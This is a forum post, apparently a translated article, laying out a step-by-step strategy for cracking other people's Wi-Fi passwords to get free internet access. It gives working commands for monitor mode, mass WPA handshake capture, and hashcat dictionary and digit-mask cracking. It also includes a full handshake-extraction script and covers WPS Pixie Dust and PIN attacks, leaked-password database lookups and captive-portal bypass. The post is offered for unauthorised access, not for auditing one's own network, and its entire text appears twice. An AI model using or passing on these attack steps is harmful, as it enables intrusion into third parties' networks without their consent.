OP 05 June, 2021 - 11:01 AM
Hope you all like it. :).thanksIs it possible to hack Wi-Fi now?
Earlier, under the articles on the audit of the security of Wi-Fi networks, they left comments in the spirit of "what are you doing here, you won't pick up a password in a thousand years." And it seems to be a correct statement, but if I just need access to the Internet, then practice in different cities and even different countries shows the same result: you can ALWAYS get a password from Wi-Fi.
We have two factors for us:
1. We do not need to hack a specific Wi-Fi network or all networks. It is enough for us to find one weak Access Point with an acceptable signal level
2. There are several very effective methods, and if you apply all of them, you will almost certainly be able to find a Wi-Fi network that will succumb to
In general, at first I wanted to make an extract of the commands that I cannot remember, so that there was something like a cheat sheet. But then the idea came up to collect all the most effective methods, which together always bring me results.
This will be a cheat sheet for me and for beginners, since most of the methods are pretty simple and almost all are fast.
That is, on the one hand, there will be no new methods in this article that would not have been considered before, but, on the other hand, there will be something like a strategy, when combining the least time-consuming and most effective methods, you can quickly achieve success in getting Internet access in a new place.
Here is an example of collected passwords in my previous place of residence (Asian hinterland with three-story houses):
3wifi-passwords.png
3wifi-passwords-2.png
Lines that start with [+] are mined with OneShot, lines that start with {"result" : true, "data": { mined with 3WiFi. 3BB-KANCHANANAT picked up with brute force. Most of the passwords were collected in 20-30 minutes.
What you need to hack Wi-Fi
1. You need a sufficient number of wireless networks. If you live on the edge of a village and you have one Wi-Fi network within your reach, which you can see, it is invisible that there are not very many chances.
The more networks in the area, the better.
2. There are no special hardware requirements, and even Wi-Fi adapters that do not support monitor mode are suitable for some attacks. Nevertheless, I highly recommend adapters with an external antenna, and if the antenna is removable, then it is better to buy another bigger one. IMHO, half of the "skills" of a Wi-Fi cracker in a large antenna ...
Required commands
Further I will only say "adapter in monitor mode" or "adapter in controlled mode", I will not duplicate these commands.
To view the names of the wireless interfaces and their current mode:
The code:Copy to clipboard
iw dev
To switch the Wi-Fi card to monitor mode:
Bash:Copy to clipboard
sudo ip link set <ИНТЕРФЕЙС> down
sudo iw <ИНТЕРФЕЙС> set monitor control
sudo ip link set <ИНТЕРФЕЙС> up
If the attack does not need an Internet connection (and some do need it), then it is better to stop the processes that may interfere (when the first command is executed, the Internet connection will be lost):
Bash:Copy to clipboard
sudo systemctl stop NetworkManager
sudo airmon-ng check kill
Return to managed mode:
Bash:Copy to clipboard
sudo ip link set <ИНТЕРФЕЙС> down
sudo iw <ИНТЕРФЕЙС> set type managed
sudo ip link set <ИНТЕРФЕЙС> up
Or just unplug and plug the Wi-Fi adapter - by default, it is always enabled in managed mode.
If you stopped NetworkManager, then to start it run:
Bash:Copy to clipboard
sudo systemctl start NetworkManager
Finding Already Hacked Wireless Access Points
This is the simplest method, it does not require a wireless connection, but it does require an Internet connection. After the end of the scan, when the seen APs are checked against the database, the Wi-Fi adapter (which performed the scan) is no longer used. That is, while the check is taking place, you can move on to the next attack. If you have another, non-guest 3WiFi account, then in the script itself, replace the API and remove the line
The code:Copy to clipboard
sleep 15;
In this case, the script will not pause between checks.
In Windows, you can use Router Scan by Stas'M to view the BSSID, and then search for 3WiFi. For details, see the article "3WiFi Service: Passwords from Wi-Fi Access Points". If I'm not mistaken, Router Scan can automatically check the Access Points it sees using the 3WiFi database.
Pixie Dust without monitor mode
About the OneShot program, the author of the current mod wrote to me in a commentary - since then it is my favorite program, I run it even more often than my own WiFi-autopwner script.
This program can only receive passwords from APs with WPS enabled, but it does not need monitor mode. With a Pixie Dust attack, the password can be obtained in a matter of seconds.
For Windows, the analogue is Router Scan by Stas'M, for details see the article "New features of Router Scan by Stas'M v2.60: wireless hacking of Wi-Fi from Windows".
Fast brute-force password
Unfortunately, there are not very many access points with WPS enabled. Nevertheless, we will return to them later. Now we will look at the classic variant of capturing a handshake and cracking a password. Its speed is as follows:
automatically captures handshakes for all Access Points within reach
two types of brute-force are launched with Hashcat: using a dictionary and an eight-digit mask. Experience shows that quite a few TDs are amenable to. This method also has a good time-to-value ratio.
We transfer the wireless interface to monitor mode.
We run the command to collect handshakes:
Bash:Copy to clipboard
sudo besside-ng ИНТЕРФЕЙС -W
All handshakes will be saved to the wpa.cap file .
If you are going to hack them all, then you can convert everything at once to hashcat format using cap2hccapx:
Bash:Copy to clipboard
cap2hccapx wpa.cap output.hccapx
If you only need a hash of a specific Access Point, then use the network name (ESSID) as a filter. For example, I'm only interested in the netis56 Wi-Fi handshake and I want to save it to the netis56.hccapx file :
Bash:Copy to clipboard
cap2hccapx wpa.cap netis56.hccapx netis56
If you want to split the wpa.cap file into separate handshakes, then use handshakes_extractor.sh , and then also convert them with the cap2hccapx program .
handshakes_extractor.sh
Bash:Copy to clipboard
#!/bin/bash
# Автор: MiAl
AIRCRACK_TIMEOUT=2 # Сколько времени дано программе aircrack-ng для считывания файла. Время указывается в секундах
# если у вас очень большой файл или очень медленная система, то увеличьте это значение
DIR=`date +"%Y-%m-%d-%H%M%S"`
ISDIRCREATED=0
if [[ "$1" && -f "$1" ]]; then
FILE="$1"
else
echo 'Укажите .(p)cap файл, из которого нужно извлечь рукопожатия.';
echo 'Пример запуска:';
echo -e "\tbash handshakes_extractor.sh wpa.cap";
exit 1
fi
while read -r "line" ; do
if [ "$(echo "$line" | grep 'WPA' | grep -E -v '(0 handshake)' | grep -E 'WPA \(' | awk -F ' ' '{print $3}')" ]; then
if [ $ISDIRCREATED -eq 0 ]; then
mkdir ./$DIR || (echo "Невозможно создать каталог для сохранения рукопожатий. Выход." && exit 1)
ISDIRCREATED=1
fi
ESSID="$(echo "$line" | grep 'WPA' | grep -E -v '(0 handshake)' | grep -E 'WPA \(' | awk -F ' ' '{print $3}')"
BSSID="$(echo "$line" | grep 'WPA' | grep -E -v '(0 handshake)' | grep -E 'WPA \(' | awk -F ' ' '{print $2}')"
echo -e "\033[0;32mНайдено рукопожатие для сети $ESSID ($BSSID). Сохранено в файл $DIR/\033[1m$ESSID.pcap\e[0m"
tshark -r $FILE -R "(wlan.fc.type_subtype == 0x08 || wlan.fc.type_subtype == 0x05 || eapol) && wlan.addr == $BSSID" -2 2>/dev/null
tshark -r $FILE -R "(wlan.fc.type_subtype == 0x08 || wlan.fc.type_subtype == 0x05 || eapol) && wlan.addr == $BSSID" -2 -w ./$DIR/"$ESSID.pcap" -F pcap 2>/dev/null
fi
done < <(timeout $AIRCRACK_TIMEOUT aircrack-ng $FILE)
Launch example:
Bash:Copy to clipboard
bash handshakes_extractor.sh wpa.cap
For the dictionary attack I use the rockyou dictionary, the cleaned version can be downloaded from this link .
An example of a successful dictionary cracking (cracking time 9 seconds): Another example of a successful dictionary cracking (cracking time 13 seconds): My command to run:
hashcat-dictionary.png
hashcat-dictionary-2.png
Bash:Copy to clipboard
hashcat --force --hwmon-temp-abort=100 -m 2500 -D 1,2 -a 0 'ХЕШ.hccapx' /ПУТЬ/ДО/rockyou_cleaned.txt
In this command, the required options are:
'HASH.hccapx' is your hccapx file with one or more hashes
/PATH/TO/rockyou_cleaned.txt - path to the dictionary
-m 2500 - the type of hash to be cracked is specified
Optional options:
-a 0 - attack type: dictionary attack. May be skipped, since it is assumed by default
-D 1,2 - means use both the CPU and the video card to crack the password. If not specified, most likely only the video card will be selected
--force means to ignore warnings. Without this option, my central processor is not used to crack passwords. Be careful with this option
--hwmon-temp-abort = 100 is the maximum temperature at which brute-force will be forcibly aborted. I have such a climate that during the day in the room it is always more than + 30 ℃, besides, I run brute force on a laptop (I do not recommend doing this on a laptop !!!), so in my conditions the default barrier of + 90 ℃ is achieved very quickly and the busting stops. With this option, set to a temperature higher than the default 90, you can actually burn your computer / video card / laptop. Use exclusively at your own peril and risk - I WARNED YOU !!! Although in practice my temperature reaches 94-96 and then the video card drops the frequencies - apparently, it also has its own limit.
To launch a mask attack:
Bash:Copy to clipboard
hashcat --force --hwmon-temp-abort=100 -m 2500 -D 1,2 -a 3 'ХЕШ.hccapx' ?d?d?d?d?d?d?d?d
New in this command:
? d? d? d? d? d? d? d? d - mask, means eight digits, on my hardware it takes about 20 minutes. To create a mask with more digits, add ? d .
-a 3 - means mask attack.
In addition to 8-digit passwords, 9-11-digit passwords are also common (the latter are most often phone numbers, so you can specify the mask as 89? D? D? D? D? D? D? D? D? D ), but each an additional digit increases the search time by 10 times.
Hacking WPS by the most probable pins
In addition to the already considered Pixie Dust attack, there is another very interesting attack on Access Points with WPS enabled. The fact is that for some models of routers, pins are generated according to certain algorithms, for example, based on the MAC address of the router or its serial number. Knowing this data, you can generate one or more pins that are highly likely to be suitable for a wireless access point.
Such an attack is implemented in WiFi-autopwner - this script requires an Internet connection to request PINs online, but a fix is implemented for adapters on the Ralink chipset (most of them).
An example of very quickly hacked Wi-Fi networks using this method: Another similar attack is implemented in airgeddon. But in this program, WPS attacks do not work with adapters based on Ralink chipsets. In this program, you need to use, for example, Alfa AWUS036NHA (Atheros chipset). Best with the Alfa ARS-N19 antenna . I also use such a bundle. Open networks. Bypassing intercepting portals I haven't seen normal open networks for a very long time. But there are enough intercepting portals.
wps-10.png
wps-11.png
Many of these can be bypassed with the hack-captive-portals program.
Wireless Adapters for Hacking Wi-Fi
A good option for beginners is the Alfa AWUS036NHA with the Alfa ARS-N19 antenna . This is generally a very good Wi-Fi adapter for hacking wireless networks, including attacks on WPS. The disadvantage of this card is that it is rather old and does not support modern protocols.
To support modern protocols, you can choose an Alfa with external antennas from this list.
Earlier, under the articles on the audit of the security of Wi-Fi networks, they left comments in the spirit of "what are you doing here, you won't pick up a password in a thousand years." And it seems to be a correct statement, but if I just need access to the Internet, then practice in different cities and even different countries shows the same result: you can ALWAYS get a password from Wi-Fi.
We have two factors for us:
1. We do not need to hack a specific Wi-Fi network or all networks. It is enough for us to find one weak Access Point with an acceptable signal level
2. There are several very effective methods, and if you apply all of them, you will almost certainly be able to find a Wi-Fi network that will succumb to
In general, at first I wanted to make an extract of the commands that I cannot remember, so that there was something like a cheat sheet. But then the idea came up to collect all the most effective methods, which together always bring me results.
This will be a cheat sheet for me and for beginners, since most of the methods are pretty simple and almost all are fast.
That is, on the one hand, there will be no new methods in this article that would not have been considered before, but, on the other hand, there will be something like a strategy, when combining the least time-consuming and most effective methods, you can quickly achieve success in getting Internet access in a new place.
Here is an example of collected passwords in my previous place of residence (Asian hinterland with three-story houses):
3wifi-passwords.png
3wifi-passwords-2.png
Lines that start with [+] are mined with OneShot, lines that start with {"result" : true, "data": { mined with 3WiFi. 3BB-KANCHANANAT picked up with brute force. Most of the passwords were collected in 20-30 minutes.
What you need to hack Wi-Fi
1. You need a sufficient number of wireless networks. If you live on the edge of a village and you have one Wi-Fi network within your reach, which you can see, it is invisible that there are not very many chances.
The more networks in the area, the better.
2. There are no special hardware requirements, and even Wi-Fi adapters that do not support monitor mode are suitable for some attacks. Nevertheless, I highly recommend adapters with an external antenna, and if the antenna is removable, then it is better to buy another bigger one. IMHO, half of the "skills" of a Wi-Fi cracker in a large antenna ...
Required commands
Further I will only say "adapter in monitor mode" or "adapter in controlled mode", I will not duplicate these commands.
To view the names of the wireless interfaces and their current mode:
The code:Copy to clipboard
iw dev
To switch the Wi-Fi card to monitor mode:
Bash:Copy to clipboard
sudo ip link set <ИНТЕРФЕЙС> down
sudo iw <ИНТЕРФЕЙС> set monitor control
sudo ip link set <ИНТЕРФЕЙС> up
If the attack does not need an Internet connection (and some do need it), then it is better to stop the processes that may interfere (when the first command is executed, the Internet connection will be lost):
Bash:Copy to clipboard
sudo systemctl stop NetworkManager
sudo airmon-ng check kill
Return to managed mode:
Bash:Copy to clipboard
sudo ip link set <ИНТЕРФЕЙС> down
sudo iw <ИНТЕРФЕЙС> set type managed
sudo ip link set <ИНТЕРФЕЙС> up
Or just unplug and plug the Wi-Fi adapter - by default, it is always enabled in managed mode.
If you stopped NetworkManager, then to start it run:
Bash:Copy to clipboard
sudo systemctl start NetworkManager
Finding Already Hacked Wireless Access Points
This is the simplest method, it does not require a wireless connection, but it does require an Internet connection. After the end of the scan, when the seen APs are checked against the database, the Wi-Fi adapter (which performed the scan) is no longer used. That is, while the check is taking place, you can move on to the next attack. If you have another, non-guest 3WiFi account, then in the script itself, replace the API and remove the line
The code:Copy to clipboard
sleep 15;
In this case, the script will not pause between checks.
In Windows, you can use Router Scan by Stas'M to view the BSSID, and then search for 3WiFi. For details, see the article "3WiFi Service: Passwords from Wi-Fi Access Points". If I'm not mistaken, Router Scan can automatically check the Access Points it sees using the 3WiFi database.
Pixie Dust without monitor mode
About the OneShot program, the author of the current mod wrote to me in a commentary - since then it is my favorite program, I run it even more often than my own WiFi-autopwner script.
This program can only receive passwords from APs with WPS enabled, but it does not need monitor mode. With a Pixie Dust attack, the password can be obtained in a matter of seconds.
For Windows, the analogue is Router Scan by Stas'M, for details see the article "New features of Router Scan by Stas'M v2.60: wireless hacking of Wi-Fi from Windows".
Fast brute-force password
Unfortunately, there are not very many access points with WPS enabled. Nevertheless, we will return to them later. Now we will look at the classic variant of capturing a handshake and cracking a password. Its speed is as follows:
automatically captures handshakes for all Access Points within reach
two types of brute-force are launched with Hashcat: using a dictionary and an eight-digit mask. Experience shows that quite a few TDs are amenable to. This method also has a good time-to-value ratio.
We transfer the wireless interface to monitor mode.
We run the command to collect handshakes:
Bash:Copy to clipboard
sudo besside-ng ИНТЕРФЕЙС -W
All handshakes will be saved to the wpa.cap file .
If you are going to hack them all, then you can convert everything at once to hashcat format using cap2hccapx:
Bash:Copy to clipboard
cap2hccapx wpa.cap output.hccapx
If you only need a hash of a specific Access Point, then use the network name (ESSID) as a filter. For example, I'm only interested in the netis56 Wi-Fi handshake and I want to save it to the netis56.hccapx file :
Bash:Copy to clipboard
cap2hccapx wpa.cap netis56.hccapx netis56
If you want to split the wpa.cap file into separate handshakes, then use handshakes_extractor.sh , and then also convert them with the cap2hccapx program .
handshakes_extractor.sh
Bash:Copy to clipboard
#!/bin/bash
# Автор: MiAl
AIRCRACK_TIMEOUT=2 # Сколько времени дано программе aircrack-ng для считывания файла. Время указывается в секундах
# если у вас очень большой файл или очень медленная система, то увеличьте это значение
DIR=`date +"%Y-%m-%d-%H%M%S"`
ISDIRCREATED=0
if [[ "$1" && -f "$1" ]]; then
FILE="$1"
else
echo 'Укажите .(p)cap файл, из которого нужно извлечь рукопожатия.';
echo 'Пример запуска:';
echo -e "\tbash handshakes_extractor.sh wpa.cap";
exit 1
fi
while read -r "line" ; do
if [ "$(echo "$line" | grep 'WPA' | grep -E -v '(0 handshake)' | grep -E 'WPA \(' | awk -F ' ' '{print $3}')" ]; then
if [ $ISDIRCREATED -eq 0 ]; then
mkdir ./$DIR || (echo "Невозможно создать каталог для сохранения рукопожатий. Выход." && exit 1)
ISDIRCREATED=1
fi
ESSID="$(echo "$line" | grep 'WPA' | grep -E -v '(0 handshake)' | grep -E 'WPA \(' | awk -F ' ' '{print $3}')"
BSSID="$(echo "$line" | grep 'WPA' | grep -E -v '(0 handshake)' | grep -E 'WPA \(' | awk -F ' ' '{print $2}')"
echo -e "\033[0;32mНайдено рукопожатие для сети $ESSID ($BSSID). Сохранено в файл $DIR/\033[1m$ESSID.pcap\e[0m"
tshark -r $FILE -R "(wlan.fc.type_subtype == 0x08 || wlan.fc.type_subtype == 0x05 || eapol) && wlan.addr == $BSSID" -2 2>/dev/null
tshark -r $FILE -R "(wlan.fc.type_subtype == 0x08 || wlan.fc.type_subtype == 0x05 || eapol) && wlan.addr == $BSSID" -2 -w ./$DIR/"$ESSID.pcap" -F pcap 2>/dev/null
fi
done < <(timeout $AIRCRACK_TIMEOUT aircrack-ng $FILE)
Launch example:
Bash:Copy to clipboard
bash handshakes_extractor.sh wpa.cap
For the dictionary attack I use the rockyou dictionary, the cleaned version can be downloaded from this link .
An example of a successful dictionary cracking (cracking time 9 seconds): Another example of a successful dictionary cracking (cracking time 13 seconds): My command to run:
hashcat-dictionary.png
hashcat-dictionary-2.png
Bash:Copy to clipboard
hashcat --force --hwmon-temp-abort=100 -m 2500 -D 1,2 -a 0 'ХЕШ.hccapx' /ПУТЬ/ДО/rockyou_cleaned.txt
In this command, the required options are:
'HASH.hccapx' is your hccapx file with one or more hashes
/PATH/TO/rockyou_cleaned.txt - path to the dictionary
-m 2500 - the type of hash to be cracked is specified
Optional options:
-a 0 - attack type: dictionary attack. May be skipped, since it is assumed by default
-D 1,2 - means use both the CPU and the video card to crack the password. If not specified, most likely only the video card will be selected
--force means to ignore warnings. Without this option, my central processor is not used to crack passwords. Be careful with this option
--hwmon-temp-abort = 100 is the maximum temperature at which brute-force will be forcibly aborted. I have such a climate that during the day in the room it is always more than + 30 ℃, besides, I run brute force on a laptop (I do not recommend doing this on a laptop !!!), so in my conditions the default barrier of + 90 ℃ is achieved very quickly and the busting stops. With this option, set to a temperature higher than the default 90, you can actually burn your computer / video card / laptop. Use exclusively at your own peril and risk - I WARNED YOU !!! Although in practice my temperature reaches 94-96 and then the video card drops the frequencies - apparently, it also has its own limit.
To launch a mask attack:
Bash:Copy to clipboard
hashcat --force --hwmon-temp-abort=100 -m 2500 -D 1,2 -a 3 'ХЕШ.hccapx' ?d?d?d?d?d?d?d?d
New in this command:
? d? d? d? d? d? d? d? d - mask, means eight digits, on my hardware it takes about 20 minutes. To create a mask with more digits, add ? d .
-a 3 - means mask attack.
In addition to 8-digit passwords, 9-11-digit passwords are also common (the latter are most often phone numbers, so you can specify the mask as 89? D? D? D? D? D? D? D? D? D ), but each an additional digit increases the search time by 10 times.
Hacking WPS by the most probable pins
In addition to the already considered Pixie Dust attack, there is another very interesting attack on Access Points with WPS enabled. The fact is that for some models of routers, pins are generated according to certain algorithms, for example, based on the MAC address of the router or its serial number. Knowing this data, you can generate one or more pins that are highly likely to be suitable for a wireless access point.
Such an attack is implemented in WiFi-autopwner - this script requires an Internet connection to request PINs online, but a fix is implemented for adapters on the Ralink chipset (most of them).
An example of very quickly hacked Wi-Fi networks using this method: Another similar attack is implemented in airgeddon. But in this program, WPS attacks do not work with adapters based on Ralink chipsets. In this program, you need to use, for example, Alfa AWUS036NHA (Atheros chipset). Best with the Alfa ARS-N19 antenna . I also use such a bundle. Open networks. Bypassing intercepting portals I haven't seen normal open networks for a very long time. But there are enough intercepting portals.
wps-10.png
wps-11.png
Many of these can be bypassed with the hack-captive-portals program.
Wireless Adapters for Hacking Wi-Fi
A good option for beginners is the Alfa AWUS036NHA with the Alfa ARS-N19 antenna . This is generally a very good Wi-Fi adapter for hacking wireless networks, including attacks on WPS. The disadvantage of this card is that it is rather old and does not support modern protocols.
To support modern protocols, you can choose an Alfa with external antennas from this list.